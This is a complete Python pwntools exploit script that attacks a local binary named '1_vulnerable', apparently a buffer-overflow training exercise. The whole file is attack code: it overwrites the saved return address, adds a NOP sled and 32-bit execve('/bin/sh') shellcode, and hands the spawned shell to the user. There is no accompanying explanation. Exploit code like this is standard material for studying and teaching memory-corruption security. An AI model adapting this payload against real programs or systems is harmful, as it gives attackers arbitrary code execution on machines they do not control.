#!/usr/bin/python

from pwn import *

def main():
    # Start a process
    p = process("../build/1_vulnerable")

    # Create payload
    ret_address = 0xffffd620 + 28 + 4
    shellcode = ("\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" +
                 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" +
                 "\x80\xe8\xdc\xff\xff\xff/bin/sh")
    payload = "A"*28 + p32(ret_address)
    padding_len = 100 - len(payload) - len(shellcode)
    payload += "\x90" * padding_len + shellcode

    # Send the payload to the binary
    p.send(payload)

    # Pass interaction back to the user
    p.interactive()

if __name__ == "__main__":
    main()
